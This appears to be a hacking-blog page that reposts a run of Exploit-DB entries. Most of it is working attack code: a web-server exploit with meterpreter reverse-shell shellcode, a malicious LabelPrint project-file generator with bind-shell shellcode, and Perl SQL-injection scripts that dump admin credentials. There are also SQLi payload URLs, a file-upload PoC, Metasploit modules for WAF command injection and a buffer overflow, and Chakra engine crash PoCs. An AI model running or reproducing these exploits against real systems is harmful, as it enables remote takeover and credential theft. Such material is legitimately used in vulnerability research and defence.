# Tested on Windows XP SP3 (x86)
# The application requires to have the web server enabled.
#!/usr/bin/python
import socket, threading, struct
host = "192.168.228.155"
port = 80
def send_egghunter_request():
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.228.158 LPORT=443 -f py
buf = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b"
buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7"
buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf"
buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c"
buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01"
buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31"
buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d"
buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66"
buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0"
buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f"
buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68"
buf += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8"
buf += "\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"
buf += "\xff\xd5\x6a\x0a\x68\xc0\xa8\xe4\x9e\x68\x02\x00\x01"
buf += "\xbb\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
buf += "\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
buf += "\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec"
buf += "\xe8\x61\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02"
buf += "\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a"
buf += "\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53"
buf += "\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9"
buf += "\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x22\x58\x68\x00\x40"
buf += "\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57"
buf += "\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\xe9"
buf += "\x71\xff\xff\xff\x01\xc3\x29\xc6\x75\xc7\xc3\xbb\xf0"
buf += "\xb5\xa2\x56\x6a\x00\x53\xff\xd5"
egghunter = "W00T" * 2
egghunter += "\x90" * 16 # Padding
egghunter += buf
egghunter += "\x42" * (100000 - len(egghunter))
content_length = len(egghunter) + 1000 # Just 1000 padding.
egghunter_request = "POST / HTTP/1.1\r\n"
egghunter_request += "Content-Type: multipart/form-data; boundary=evilBoundary\r\n"
egghunter_request += "Content-Length: " + str(content_length) + "\r\n"
egghunter_request += "\r\n"
egghunter_request += egghunter
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.send(egghunter_request)
s.recv(1024)
s.close()
def send_exploit_request():
buffer = "\x90" * 2495
buffer += "\xeb\x06\x90\x90" # short jump
buffer += struct.pack("<L", 0x1014fdef) # POP ESI; POP EBX; RETN - libspp
# ./egghunter.rb -b "\x00\x0a\x0b" -e "W00T" -f py
buffer += "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c"
buffer += "\x05\x5a\x74\xef\xb8\x57\x30\x30\x54\x89\xd7\xaf\x75"
buffer += "\xea\xaf\x75\xe7\xff\xe7"
buffer += "\x41" * (6000 - len(buffer))
#HTTP Request
request = "GET /" + buffer + "HTTP/1.1" + "\r\n"
request += "Host: " + host + "\r\n"
request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0" + "\r\n"
request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + "\r\n"
request += "Accept-Language: en-US,en;q=0.5" + "\r\n"
request += "Accept-Encoding: gzip, deflate" + "\r\n"
request += "Connection: keep-alive" + "\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.send(request)
s.close()
if __name__ == "__main__":
t = threading.Thread(target=send_egghunter_request)
t.start()
print "[+] Thread started."
send_exploit_request()
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863582431
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
#!/usr/bin/python
# Exploit Title: CyberLink LabelPrint <=2.5 File Project Processing Unicode Stack Overflow
# Date: September 23, 2017
# Exploit Author: f3ci
# Vendor Homepage: https://www.cyberlink.com/
# Software Link: http://update.cyberlink.com/Retail/Power2Go/DL/TR170323-021/CyberLink_Power2Go_Downloader.exe
# Version: 2.5
# Tested on: Windows 7x86, Windows8.1x64, Windows 10
# CVE : CVE-2017-14627
#
# Note: Cyberlink LabelPrint is bundled with Power2Go application and also included in most HP, Lenovo, and Asus laptops.
# this proof of concept is based on the LabelPrint 2.5 that comes with Power2Go installation.
def exp():
header = ("\x3c\x50\x52\x4f\x4a\x45\x43\x54\x20\x76\x65\x72\x73\x69\x6f\x6e"
"\x3d\x22\x31\x2e\x30\x2e\x30\x30\x22\x3e\x0a\x09\x3c\x49\x4e\x46"
"\x4f\x52\x4d\x41\x54\x49\x4f\x4e\x20\x74\x69\x74\x6c\x65\x3d\x22"
"\x22\x20\x61\x75\x74\x68\x6f\x72\x3d\x22\x22\x20\x64\x61\x74\x65"
"\x3d\x22\x37\x2f\x32\x34\x2f\x32\x30\x31\x37\x22\x20\x53\x79\x73"
"\x74\x65\x6d\x54\x69\x6d\x65\x3d\x22\x32\x34\x2f\x30\x37\x2f\x32"
"\x30\x31\x37\x22\x3e")
filename2 = "labelprint_poc_universal.lpp"
f = open(filename2,'w')
junk = "A" * 790
nseh = "\x61\x42"
seh = "\x2c\x44"
nop = "\x42"
#msfvenom -p windows/shell_bind_tcp LPORT=4444 -e x86/unicode_mixed BufferRegister=EAX -f python
buf = ""
buf += "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQ"
buf += "AIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYA"
buf += "ZBABABABABkMAGB9u4JBkL7x52KPYpM0aPqyHeMa5pbDtKNpNPBk"
buf += "QBjlTKaBkd4KD2mXzo87pJlfNQ9ovLOLs1cLIrnLMPGQfoZmyqI7"
buf += "GrZRobnwRk1Bn0bknjOLDKPLkaQhGsNhzawaOa4KaIO0M1XSbka9"
buf += "lXISmja9Rkp4TKM1FvMaYofLfaXOjmYqUw08wp0uJVJcqmYhmk3M"
buf += "o4rUk41HTK28NDjaFsrFRklLPK4KaHklzaICTKytbkM1VpSYa4nD"
buf += "NDOkaKaQ291JoaIoWpqOaOQJtKN2HkTMOmOxOCOBIpm0C8CGT3oB"
buf += "OopTC80L2WNFzgyoz5Txf0ZaYpm0kyfdB4np38kycPpkypIoiEPj"
buf += "kXqInp8bKMmpr010pPC8YZjoiOK0yohU67PhLBypjq1L3YzF1ZLP"
buf += "aFaGPh7R9KoGBGKO8U271XEg8iOHIoiohUaGrH3DJLOK7qIo9EPW"
buf += "eG1XBU0nnmc1YoYEC81SrMs4ip4IyS27ogaGnQjVaZn2B9b6jBkM"
buf += "S6I7oTMTMliqkQ2m14nDN0UvKPndb4r0of1FNv0Fr6nn0VR6B31F"
buf += "BH49FlmoTFyoIEbi9P0NPVq6YolpaXjhsWmMc0YoVuGKHpEe3rnv"
buf += "QXVFce5mcmkOiEMlKV1lLJ3Pyk9PT5m5GKoWZsSBRO2JypPSYoxUAA"
#preparing address for decoding
ven = nop #nop/inc edx
ven += "\x54" #push esp
ven += nop #nop/inc edx
ven += "\x58" #pop eax
ven += nop #nop/inc edx
ven += "\x05\x1B\x01" #add eax 01001B00 universal
ven += nop #nop/inc edx
ven += "\x2d\x01\x01" #sub eax 01001000
ven += nop #nop/inc edx
ven += "\x50" #push eax
ven += nop #nop/inc edx
ven += "\x5c" #pop esp
#we need to encode the RET address, since C3 is bad char.
#preparing ret opcode
ven += nop #nop/inc edx
ven += "\x25\x7e\x7e" #and eax,7e007e00
ven += nop #nop/inc edx
ven += "\x25\x01\x01" #and eax,01000100
ven += nop #nop/inc edx
ven += "\x35\x7f\x7f" #xor eax,7f007f00
ven += nop #nop/inc edx
ven += "\x05\x44\x44" #add eax,44004400
ven += nop #nop/inc edx
ven += "\x57" #push edi
ven += nop #nop/inc edx
ven += "\x50" #push eax
ven += junk2 #depending OS
#custom venetian
ven += "\x58" #pop eax
ven += nop #nop/inc edx
ven += "\x58" #pop eax
ven += nop #nop/inc edx
ven += align #depending OS
ven += nop #nop/inc edx
ven += "\x2d\x01\x01" #add eax, 01000100 #align eax to our buffer
ven += nop #nop/inc edx
ven += "\x50" #push eax
ven += nop #nop/inc edx
#call esp 0x7c32537b MFC71U.dll
ven += "\x5C" #pop esp
ven += nop #nop/inc edx
ven += "\x58" #pop eax
ven += nop #nop/inc edx
ven += "\x05\x53\x7c" #add eax 7c005300 part of call esp
ven += nop #nop/inc edx
ven += "\x50" #push eax
ven += junk1 #depending OS
ven += "\x7b\x32" #part of call esp
#preparing for shellcode
ven += nop * 114 #junk
ven += "\x57" #push edi
ven += nop #nop/inc edx
ven += "\x58" #pop eax
ven += nop #nop/inc edx
ven += align2 #depending OS
ven += nop #nop/inc edx
ven += "\x2d\x01\x01" #sub eax,01000100
ven += nop #nop/inc edx
ven += buf #shellcode
sisa = nop * (15000-len(junk+nseh+seh+ven))
payload = junk+nseh+seh+ven+sisa
bug="\x09\x09\x3c\x54\x52\x41\x43\x4b\x20\x6e\x61\x6d\x65\x3d"+'"'+payload+'"'+"/>\n"
bug+=("\x09\x3c\x2f\x49\x4e\x46\x4f\x52\x4d\x41\x54\x49\x4f\x4e\x3e\x0a"
"\x3c\x2f\x50\x52\x4f\x4a\x45\x43\x54\x3e")
f.write(header+ "\n" + bug)
print "[+] File", filename2, "successfully created!"
print "[*] Now open project file", filename2, "with CyberLink LabelPrint."
print "[*] Good luck ;)"
f.close()
print "[*] <--CyberLink LabelPrint <=2.5 Stack Overflow POC-->"
print "[*] by f3ci & modpr0be <research[at]spentera.id>"
print "[*] <------------------------------------------------->\n"
print "\t1.Windows 7 x86 bindshell on port 4444"
print "\t2.Windows 8.1 x64 bindshell on port 4444"
print "\t3.Windows 10 x64 bindshell on port 4444\n"
input = input("Choose Target OS : ")
try:
if input == 1:
align = "\x05\x09\x01" #add eax,01000400
align2 = "\x05\x0A\x01" #add eax, 01000900
junk1 = '\x42' * 68 #junk for win7x86
junk2 = '\x42' * 893 #junk for win7x86
exp()
elif input == 2:
align = "\x05\x09\x01" #add eax,01000400
align2 = "\x05\x0A\x01" #add eax, 01000900
junk1 = '\x42' * 116 #junk for win8.1x64
junk2 = '\x42' * 845 #junk for win8.1x64
exp()
elif input == 3:
align = "\x05\x05\x01" #add eax,01000400
align2 = "\x05\x06\x01" #add eax, 01000900
junk1 = '\x42' * 136 #junk for win10x64
junk2 = '\x42' * 313 #junk for win10x64
exp()
else:
print "Choose the right one :)"
except:
print ""
# Exploit Title: JitBit HelpDesk <= 9.0.2 Broken Authentication
# Google Dork: "Powered by Jitbit HelpDesk" -site:jitbit.com
# Date: 09/22/2017
# Exploit Author: Rob Simon (Kc57) - TrustedSec www.trustedsec.com
# Vendor Homepage: https://www.jitbit.com/helpdesk/
# Download Link: https://static.jitbit.com/HelpDeskTrial.zip
# Version: 9.0.2
# Tested on: Windows Server 2012
# CVE : NA
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42776.zip
# Exploit Title: PHP Auction Ecommerce Script v1.6 - SQL Injection
# Date: 2017-09-22
# Exploit Author: 8bitsec
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link: http://www.phpscriptsmall.com/product/php-auction-ecommerce-script/
# Version: 1.6
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-09-22
Product & Service Introduction:
===============================
Start your own Auction website with our Readymade PHP Auction script.
Technical Details & Description:
================================
SQL injection on [detail] URI parameter.
Proof of Concept (PoC):
=======================
SQLi:
http://localhost/[path]/detail/xx AND 1053=1053/xxxxx
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: AND 1053=1053/xxxx
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: AND SLEEP(5)/xxxx
==================
8bitsec - [https://twitter.com/_8bitsec]
# Exploit Title: Secure E-commerce Script v1.02 - SQL Injection
# Date: 2017-09-22
# Exploit Author: 8bitsec
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link: http://www.phpscriptsmall.com/product/secure-e-commerce-script/
# Version: 1.02
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-09-22
Product & Service Introduction:
===============================
Would you like to secure your Shopping Cart Script? We have the readymade solution for Secure Ecommerce Shopping Cart php that is making secure your online transaction.
Technical Details & Description:
================================
SQL injection on [sid] parameter.
Proof of Concept (PoC):
=======================
SQLi:
http://localhost/[path]/single_detail.php?sid=9 AND 5028=5028
Parameter: sid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sid=9 AND 5028=5028
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: sid=9 AND SLEEP(5)
==================
8bitsec - [https://twitter.com/_8bitsec]
# # # # #
# Exploit Title: Claydip Laravel Airbnb Clone 1.0 - Arbitrary File Upload
# Dork: N/A
# Date: 22.09.2017
# Vendor Homepage: https://www.claydip.com/
# Software Link: https://www.claydip.com/airbnb-clone.html
# Demo: https://www.claydip.com/airbnb_demo.html
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-14704
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
#
# The vulnerability allows an users upload arbitrary file....
#
# Vulnerable Source:
#
# .............1
# public function imageSubmit(Request $request)
# {
$this->validate($request, [
'image' => 'image|mimes:jpeg,png,jpg,gif,svg|max:2048',
]);
# if ($request->hasFile('profile_img_name')) {
# $file = $request->file('profile_img_name');
# //getting timestamp
# $timestamp = str_replace([' ', ':'], '-', Carbon::now()->toDateTimeString());
# $img_name = $timestamp. '-' .$file->getClientOriginalName();
# //$image->filePath = $img_name;
# $file->move(public_path().'/images/profile', $img_name);
# $postData = array('profile_img_name' => $img_name, 'profile_photo_approve' => 0);
# $user = $this->userRepository->updateUser($postData);
# flash('Profile Image Updated Successfully', 'success');
# if($request->get('uploadpage') == 2) {
# return \Redirect::to('user/edit/uploadphoto');
# }
# return \Redirect::to('user/dashboard');
# }
#
# }
# .............2
# public function proof_submit(Request $request)
# {
# if ($request->hasFile('profile_img_name')) {
# $file = $request->file('profile_img_name');
# //getting timestamp
# $timestamp = str_replace([' ', ':'], '-', Carbon::now()->toDateTimeString());
# $img_name = $timestamp. '-' .$file->getClientOriginalName();
# //$image->filePath = $img_name;
# $file->move(public_path().'/images/proof', $img_name);
# $postData = array('idproof_img_src' => $img_name, 'id_proof_approved' => 0);
# $user = $this->userRepository->updateUser($postData);
# flash('Proof Updated Successfully', 'success');
# return \Redirect::to('user/edit/uploadproof');
# }
#
# }
# .............
#
# Proof of Concept:
#
# http://localhost/[PATH]/user/edit/uploadphoto
# http://localhost/[PATH]/user/edit/uploadproof
#
# http://localhost/[PATH]/images/profile/[$timestamp].Php
#
# Etc..
# # # # #
#!/usr/bin/perl -w
# # # # #
# Exploit Title: Cash Back Comparison Script 1.0 - SQL Injection
# Dork: N/A
# Date: 22.09.2017
# Vendor Homepage: http://cashbackcomparisonscript.com/
# Software Link: http://cashbackcomparisonscript.com/demo/features/
# Demo: http://www.cashbackcomparison.info/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-14703
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
sub clear{
system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
clear();
print "
################################################################################
#### ## ## ###### ### ## ##
## ## ## ## ## ## ## ### ##
## ## ## ## ## ## #### ##
## ######### ###### ## ## ## ## ##
## ## ## ## ######### ## ####
## ## ## ## ## ## ## ## ###
#### ## ## ###### ## ## ## ##
###### ######## ## ## ###### ### ## ##
## ## ## ### ## ## ## ## ## ### ##
## ## #### ## ## ## ## #### ##
###### ###### ## ## ## ## ## ## ## ## ##
## ## ## #### ## ######### ## ####
## ## ## ## ### ## ## ## ## ## ###
###### ######## ## ## ###### ## ## ## ##
Cash Back Comparison Script 1.0 - SQL Injection
################################################################################
";
use LWP::UserAgent;
print "\nInsert Target:[http://site.com/path/]: ";
chomp(my $target=<STDIN>);
print "\n[!] Exploiting Progress.....\n";
print "\n";
$cc="/*!01116concat*/(0x3c74657874617265613e,0x557365726e616d653a,username,0x20,0x506173733a,password,0x3c2f74657874617265613e)";
$tt="users";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0');
$host = $target . "search/EfE'+/*!01116UNIoN*/+/*!01116SeLecT*/+0x31,0x32,0x33,0x34,0x35,0x36,".$cc.",0x38/*!50000FrOm*/".$tt."--+-.html";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/<textarea>(.*?)<\/textarea>/){
print "[+] Success !!!\n";
print "\n[+] Admin Detail : $1\n";
print "\n[+]$target/admin/login.php\n";
print "\n";
}
else{print "\n[-]Not found.\n";
}
# # # # #
# Exploit Title: Multi Level Marketing Script - SQL Injection
# Dork: N/A
# Date: 22.09.2017
# Vendor Homepage: http://www.i-netsolution.com/
# Software Link: http://www.i-netsolution.com/product/multi-level-marketing-script/
# Demo: http://74.124.215.220/~advaemlm/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/service_detail.php?pid=[SQL]
#
# -8'++/*!00002UNION*/+/*!00002ALL*/+/*!00002SELECT*/+0x31,0x494853414e2053454e43414e,0x33,0x34,0x35,0x36,0x37,0x38,0x39,0x307833313330,0x3131,(/*!00002SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+/*!00002FROM*/+INFORMATION_SCHEMA.TABLES+/*!00002WHERE*/+TABLE_SCHEMA=DATABASE()),0x3133,0x3134,0x3135,0x3136,0x3137--+-
#
# http://localhost/[PATH]/news_detail.php?newid=[SQL]
# http://localhost/[PATH]/event_detail.php?eventid=[SQL]
#
# Etc..
# # # # #
# # # # #
# Exploit Title: Lending And Borrowing Script - SQL Injection
# Dork: N/A
# Date: 22.09.2017
# Vendor Homepage: http://www.i-netsolution.com/
# Software Link: http://www.i-netsolution.com/product/lending-borrowing-script/
# Demo: http://74.124.215.220/~realfund/
# Version: N/A
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/single-cause.php?pid=[SQL]
#
# -22'++/*!00002UNION*/(/*!00002SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,(/*!00002SELECT*/+GROUP_CONCAT(0x557365726e616d653a,username,0x506173733a,password+SEPARATOR+0x3c62723e)+FROM+admin),0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229,0x28343329,0x28343429,0x28343529,0x28343629,0x28343729)--+-
#
# Etc..
# # # # #
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "DenyAll Web Application Firewall Remote Code Execution",
'Description' => %q{
This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a
terminal command under the context of the web server user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
],
'References' =>
[
['URL', 'https://pentest.blog/advisory-denyall-web-application-firewall-unauthenticated-remote-code-execution/']
],
'DefaultOptions' =>
{
'SSL' => true,
'RPORT' => 3001,
'Payload' => 'python/meterpreter/reverse_tcp'
},
'Platform' => ['python'],
'Arch' => ARCH_PYTHON,
'Targets' => [[ 'Automatic', { }]],
'Privileged' => false,
'DisclosureDate' => "Sep 19 2017",
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI of the vulnerable DenyAll WAF', '/'])
]
)
end
def get_token
# Taking token by exploiting bug on first endpoint.
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'webservices', 'download', 'index.php'),
'vars_get' => {
'applianceUid' => 'LOCALUID',
'typeOf' => 'debug'
}
})
if res && res.code == 200 && res.body.include?("iToken")
res.body.scan(/"iToken";s:32:"([a-z][a-f0-9]{31})";/).flatten[0]
else
nil
end
end
def check
# If we've managed to get token, that means target is most likely vulnerable.
token = get_token
if token.nil?
Exploit::CheckCode::Safe
else
Exploit::CheckCode::Appears
end
end
def exploit
# Get iToken from unauthenticated accessible endpoint
print_status('Extracting iToken value')
token = get_token
if token.nil?
fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
else
print_good("Awesome. iToken value = #{token}")
end
# Accessing to the vulnerable second endpoint where we have command injection with valid iToken
print_status('Trigerring command injection vulnerability with iToken value.')
r = rand_text_alpha(5 + rand(3));
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'webservices', 'stream', 'tail.php'),
'vars_post' => {
'iToken' => token,
'tag' => 'tunnel',
'stime' => r,
'type' => "#{r}$(python -c \"#{payload.encoded}\")"
}
})
end
end
#!/usr/bin/perl -w
# # # # #
# Exploit Title: Stock Photo Selling Script 1.0 - SQL Injection
# Dork: N/A
# Date: 21.09.2017
# Vendor Homepage: http://sixthlife.net/
# Software Link: http://sixthlife.net/product/stock-photo-selling-website/
# Demo: http://www.photoreels.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
sub clear{
system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
clear();
print "
################################################################################
#### ## ## ###### ### ## ##
## ## ## ## ## ## ## ### ##
## ## ## ## ## ## #### ##
## ######### ###### ## ## ## ## ##
## ## ## ## ######### ## ####
## ## ## ## ## ## ## ## ###
#### ## ## ###### ## ## ## ##
###### ######## ## ## ###### ### ## ##
## ## ## ### ## ## ## ## ## ### ##
## ## #### ## ## ## ## #### ##
###### ###### ## ## ## ## ## ## ## ## ##
## ## ## #### ## ######### ## ####
## ## ## ## ### ## ## ## ## ## ###
###### ######## ## ## ###### ## ## ## ##
Stock Photo Selling Script 1.0 - SQL Injection
################################################################################
";
use LWP::UserAgent;
print "\nInsert Target:[http://site.com/path/]: ";
chomp(my $target=<STDIN>);
print "\n[!] Exploiting Progress.....\n";
print "\n";
$tt="tbl_configurations";
$cc="(/*!00007SELECT*/%20GROUP_CONCAT(0x3c74657874617265613e,0x557365726e616d653a,admin_name,0x2020202020,0x50617373776f72643a,admin_password,0x3c2f74657874617265613e%20SEPARATOR%200x3c62723e)%20/*!00007FROM*/%20".$tt.")";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0');
$host = $target . "photo_view.php?photo_sid=-d1fe173d08e959397adf34b1d77e88d7'%20%20/*!00007UNION*/(/*!00007SELECT*/%200x283129,0x283229,0x283329,".$cc.",0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229,0x28343329,0x28343429,0x28343529,0x28343629)--%20-";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content; if ($answer =~/<textarea>(.*?)<\/textarea>/){
print "[+] Success !!!\n";
print "\n[+] Admin Detail : $1\n";
print "\n[+]$target/admin/index.php?mod=login\n";
print "\n";
}
else{print "\n[-]Not found.\n";
}
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Disk Pulse Enterprise GET Buffer Overflow',
'Description' => %q(
This module exploits an SEH buffer overflow in Disk Pulse Enterprise
9.9.16. If a malicious user sends a crafted HTTP GET request
it is possible to execute a payload that would run under the Windows
NT AUTHORITY\SYSTEM account.
),
'License' => MSF_LICENSE,
'Author' =>
[
'Chance Johnson', # msf module - albatross@loftwing.net
'Nipun Jaswal & Anurag Srivastava' # Original discovery -- www.pyramidcyber.com
],
'References' =>
[
[ 'EDB', '42560' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Platform' => 'win',
'Payload' =>
{
'EncoderType' => "alpha_mixed",
'BadChars' => "\x00\x0a\x0d\x26"
},
'Targets' =>
[
[ 'Disk Pulse Enterprise 9.9.16',
{
'Ret' => 0x1013ADDD, # POP EDI POP ESI RET 04 -- libpal.dll
'Offset' => 2492
}]
],
'Privileged' => true,
'DisclosureDate' => 'Aug 25 2017',
'DefaultTarget' => 0))
register_options([Opt::RPORT(80)])
end
def check
res = send_request_cgi(
'uri' => '/',
'method' => 'GET'
)
if res && res.code == 200 && res.body =~ /Disk Pulse Enterprise v9\.9\.16/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
connect
print_status("Generating exploit...")
exp = payload.encoded
exp << 'A' * (target['Offset'] - payload.encoded.length) # buffer of trash until we get to offset
exp << generate_seh_record(target.ret)
exp << make_nops(10) # NOP sled to make sure we land on jmp to shellcode
exp << "\xE9\x25\xBF\xFF\xFF" # jmp 0xffffbf2a - jmp back to shellcode start
exp << 'B' * (5000 - exp.length) # padding
print_status("Sending exploit...")
send_request_cgi(
'uri' => '/../' + exp,
'method' => 'GET',
'host' => '4.2.2.2',
'connection' => 'keep-alive'
)
handler
disconnect
end
end
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1327
Here's the method used to re-parse asmjs modules.
void JavascriptFunction::ReparseAsmJsModule(ScriptFunction** functionRef)
{
ParseableFunctionInfo* functionInfo = (*functionRef)->GetParseableFunctionInfo();
Assert(functionInfo);
functionInfo->GetFunctionBody()->AddDeferParseAttribute();
functionInfo->GetFunctionBody()->ResetEntryPoint();
functionInfo->GetFunctionBody()->ResetInParams();
FunctionBody * funcBody = functionInfo->Parse(functionRef);
#if ENABLE_PROFILE_INFO
// This is the first call to the function, ensure dynamic profile info
funcBody->EnsureDynamicProfileInfo();
#endif
(*functionRef)->UpdateUndeferredBody(funcBody);
}
First, it resets the function body and then re-parses it. But it doesn't consider that "functionInfo->Parse(functionRef);" may throw an exception. So in the case, the function body remains reseted(invalid).
We can make it throw an exception simply by exhausting the stack.
PoC:
-->
function Module() {
'use asm';
function f() {
}
return f;
}
function recur() {
try {
recur();
} catch (e) {
Module(1);
}
}
recur();
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1308
When the Chakra's parser meets "{", at first, Chakra treats it as an object literal without distinguishing whether it will be an object literal(i.e., {a: 0x1234}) or an object pattern(i.e., {a} = {a: 1234}). After finishing to parse it using "Parser::ParseTerm", if it's an object pattern, Chakra converts it to an object pattern using the "ConvertObjectToObjectPattern" method.
